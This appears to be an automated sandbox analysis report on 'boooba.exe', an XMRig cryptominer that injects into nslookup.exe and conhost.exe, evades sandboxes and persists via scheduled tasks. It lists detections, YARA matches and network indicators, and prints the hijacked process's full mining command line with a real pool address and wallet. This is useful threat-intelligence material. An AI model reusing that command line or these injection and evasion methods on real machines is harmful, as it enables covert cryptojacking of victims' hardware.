Windows Analysis Report
boooba.exe

Overview

General Information

Sample name: boooba.exe
Analysis ID: 1545299
MD5: ef9e6a4bab77a1e5ed51669eabeba31d
SHA1: 43b67b32d2fd462f0cb9277ed974d63a5575fc8c
SHA256: ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
Tags: CoinMiner, exe, XMRig, user-NDA0E

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
DNS related to crypt mining pools
Detected Stratum mining protocol
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses nslookup.exe to query domains
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection

Source: boooba.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Avira: detection malicious, Label: HEUR/AGEN.1344832
Source: C:\Users\user\IOAshdohSha.exe Avira: detection malicious, Label: HEUR/AGEN.1344202
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe ReversingLabs: Detection: 73%
Source: C:\Users\user\IOAshdohSha.exe ReversingLabs: Detection: 71%
Source: boooba.exe ReversingLabs: Detection: 71%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Joe Sandbox ML: detected
Source: C:\Users\user\IOAshdohSha.exe Joe Sandbox ML: detected
Source: boooba.exe Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: conhost.exe PID: 5348, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 4136, type: MEMORYSTR
Source: unknown DNS query: name: xmr-eu1.nanopool.org
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]

Networking

Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: global traffic TCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300
Source: Joe Sandbox View IP Address: 212.47.253.124
Source: Joe Sandbox View ASN Name: OnlineSASFR
Source: Network traffic Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49731 -> 212.47.253.124:10300
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: xmr-eu1.nanopool.org
Source: conhost.exe, 00000001.00000002.1725964191.000001575B3C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xmrig.com/wizard%s

System Summary

Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.nslookup.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 12.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 13.2.nslookup.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000005.00000002.1747235973.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2901128329.0000029965300000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000A.00000002.1784948706.00000000005C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000008.00000002.1757539408.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000001.00000002.1725057798.0000015759250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
